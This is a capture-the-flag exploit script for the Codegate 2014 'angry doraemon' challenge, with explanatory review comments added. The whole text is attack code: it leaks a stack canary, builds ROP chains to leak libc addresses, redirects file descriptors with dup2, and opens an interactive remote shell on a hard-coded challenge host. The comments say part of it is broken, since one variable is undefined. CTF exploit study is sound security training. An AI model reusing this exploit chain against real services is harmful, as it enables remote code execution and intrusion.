
Codegate 2014 doraemon write up by @_g05u_

a guest Feb 23rd, 2014 560 Never
  1. #!/usr/bin/env python
  2. #-*- coding:utf-8 -*-
  3.  
  4. # Codegate 2014 write up by @_g05u_
  5. # angry doraemon
  6. # pwnable 250
  7. # null-life.com
  8.  
  9. import re
  10. import os
  11. import sys
  12. import math
  13. import time
  14. import struct
  15. import socket
  16.  
HOST = "58.229.183.18"  # challenge server address from the 2014 event
PORT = 8888

# Ubuntu 13.10 x86: the libc build these two offsets were taken from. They are
# distances from the libc load base, so they are only valid for that exact build.
offset_libc_main = 0x19810
offset_dup2 = 0xE11F0

# Fixed 0x0804.... addresses: the target binary is loaded at a constant base
# (no PIE), which is why GOT, gadget and code locations can be hard-coded.
got_libc_main = 0x0804B038  # GOT slot for __libc_start_main (per the name); not referenced anywhere below in this paste
got_write = 0x080486e0      # write() entry used by gadget_leer; presumably the PLT stub, given the .text-range address
rop_pop2_ret = 0x080495BE   # pop;pop;ret gadget (per the name), used to discard two call arguments
exec_sh = 0x08048C62        # in-binary address that get_rop_shell's chain returns into last

# Initial canary value; get_canary() replaces it at run time with the leaked
# one. The leading 0x00 matches glibc's convention of a zero low byte in the
# stack canary (little-endian, so the low byte is stored first).
canary = "\x00\x8b\xc3\x84"
  30.  
  31.  
def get_socket():
    """Open a fresh TCP connection to HOST:PORT and return the connected socket.

    Every phase of the script calls this for its own connection; nothing in
    this file closes the sockets it returns.
    """
    conn = socket.create_connection((HOST, PORT))
    return conn
  36.        
def read_logo(s):
    """Consume the banner and the menu prompt so *s* is positioned at the menu.

    Reads until a chunk containing 'Waiting 2 seconds' arrives, sleeps 2.2 s
    (slightly past the delay the banner announces), then reads until a chunk
    containing '>' arrives. Returns nothing; the received data is discarded.

    Caveat: each recv() replaces the previous chunk rather than appending to
    it, so a marker split across two chunks is never matched, and an empty
    recv() after the peer closes keeps the loop spinning instead of failing.
    """
    def wait_for(marker, size):
        # Keep pulling chunks until one of them contains the marker.
        chunk = ''
        while marker not in chunk:
            chunk = s.recv(size)

    wait_for('Waiting 2 seconds', 5 * 1024)
    time.sleep(2.2)  # let the announced 2-second pause elapse
    wait_for('>', 1024)
  45.                
  46.  
def gadget_leer(addr, n):
    """Return a 20-byte ROP frame that calls write(4, addr, n).

    Layout, all little-endian dwords: the write() entry (got_write), the
    address control returns to afterwards (0x080492c5, labelled "exit return"
    in the original), then write's three arguments — descriptor 4 (the open
    connection, per the original "fd abierto" comment), the source address and
    the byte count. The effect is to send *n* bytes of the process's memory at
    *addr* back over the connection, which is what the Spanish name ("leer" =
    read) refers to.
    """
    exit_return = 0x080492c5
    connection_fd = 0x4
    return struct.pack("<5I", got_write, exit_return, connection_fd, addr, n)
  55.  
def get_canary():
    """Leak the 4-byte stack canary via menu option 4 and return it as a str.

    Opens its own connection, selects option '4', answers the prompt with ten
    'y' bytes and reads back a 26-byte echo; bytes 22..25 of that echo are
    taken as the canary. Why those bytes hold the canary is not visible in
    this file — presumably the service echoes its input buffer without a
    terminator, so the copy runs into adjacent stack data; confirm against the
    binary. recv(26) may return fewer bytes than asked for, in which case the
    slice is shorter than 4 bytes. The socket is left open and not returned.
    """
    print('[+] get canary ')
    conn = get_socket()
    read_logo(conn)
    conn.send('4')
    time.sleep(0.1)
    conn.recv(1024)  # discard the question text
    time.sleep(0.1)
    conn.send('y' * 10)
    time.sleep(0.1)
    echo = conn.recv(26)  # the echoed option line, canary included
    leaked = echo[22:]
    print('[+] Canary 0x%s' % leaked.encode('hex'))
    return leaked
  70.  
def get_rop_shell(libc_base):
    """Build the ROP chain that maps the connection onto fds 0-2 and then enters exec_sh.

    For each target descriptor 0, 1 and 2 the chain holds four dwords: the
    resolved dup2 address (libc_base + offset_dup2), the pop;pop;ret gadget as
    its return address so the two arguments are popped before continuing, then
    the arguments (4, fd) — i.e. dup2(4, fd), with 4 being the open connection
    per the original "fd abierto" comment. The last dword is exec_sh, the
    address the chain returns into after the third dup2. Returns the packed
    little-endian byte string; also prints the resolved dup2 address.
    """
    dup2_addr = libc_base + offset_dup2
    print('[+] dup2 address: %s' % hex(dup2_addr))
    frames = [
        struct.pack("<IIII", dup2_addr, rop_pop2_ret, 4, target_fd)
        for target_fd in (0, 1, 2)
    ]
    return b''.join(frames) + struct.pack("<I", exec_sh)
  90.  
canary = get_canary()  # replace the placeholder canary with the value leaked from the live service

print 'Obteniendo libc base'
# Leak the libc load base: option 4 again, but the answer to the prompt is now
# overlong and carries a ROP frame that makes the service write() 4 bytes of
# its memory back over the connection. Payload layout (from the concatenation
# below): 10 bytes of input, the 4-byte canary kept in place, 12 filler bytes,
# then the frame. What the 12 bytes cover (saved registers between canary and
# return address) is not visible in this file.
s = get_socket()
read_logo(s)
s.send('4')
time.sleep(0.1)
s.recv(1024) # discard the question text
time.sleep(0.1)
s.send('y'*10 + canary + "A"*12 + gadget_leer(offset_libc_main, 4))
# NOTE(review): `base_libc_main` is not defined anywhere in this file, so this
# line raises NameError as pasted, while the `got_libc_main` constant defined
# above is never used; which constant belongs in which position is not
# recoverable from this paste. Also, recv(4) may legitimately return fewer than
# 4 bytes, which would make struct.unpack raise struct.error.
libc_base_address = struct.unpack("<I", s.recv(4))[0] - base_libc_main
print '[+] Addres libc base: %s' % hex(libc_base_address)

print 'Lanzando shell'
# Launch the shell: same overlong answer, now carrying the dup2/exec_sh chain
# built from the leaked base. A fresh connection is opened; the previous one is
# never closed (no socket in this script is).
rop_shell = get_rop_shell(libc_base_address)
s = get_socket()
read_logo(s)
s.send('4')
time.sleep(0.1)
s.recv(1024) # discard the question text
time.sleep(0.1)
s.send('y'*10 + canary + "A"*12 + rop_shell)

# Minimal interactive loop: forward one stdin line per iteration, wait 0.5 s,
# then print at most one 4095-byte chunk. Output longer than that, or slower
# than 0.5 s, only shows up on a later iteration; EOF on stdin yields '' and
# the loop keeps going, so interrupting the process is the only way out.
while True:
    sys.stdout.write("$ ")
    sys.stdout.flush()
    c = sys.stdin.readline()
    s.send(c)
    time.sleep(0.5)
    print s.recv(4095)